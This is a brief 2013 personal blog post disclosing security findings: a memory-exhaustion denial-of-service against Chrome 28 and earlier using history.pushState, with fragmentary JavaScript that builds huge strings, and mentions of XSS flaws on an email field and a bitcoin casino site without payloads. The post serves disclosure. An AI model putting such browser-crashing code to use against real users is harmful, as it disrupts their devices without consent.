Monday, July 22, 2013

In the meantime...

Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:

  • Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
    var r="BOMB!";for(var e=0;e<22;e++){r+=r;}
    for(var d=0;d<100000;d++) {
    Live demo

    On android 4.2.2 @ nexus 7 this is quicker:
    var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));}

  • XSS (Email parameter was neither validated nor sanitized)

  • (bitcoin casino) XSS :


No comments:

Post a Comment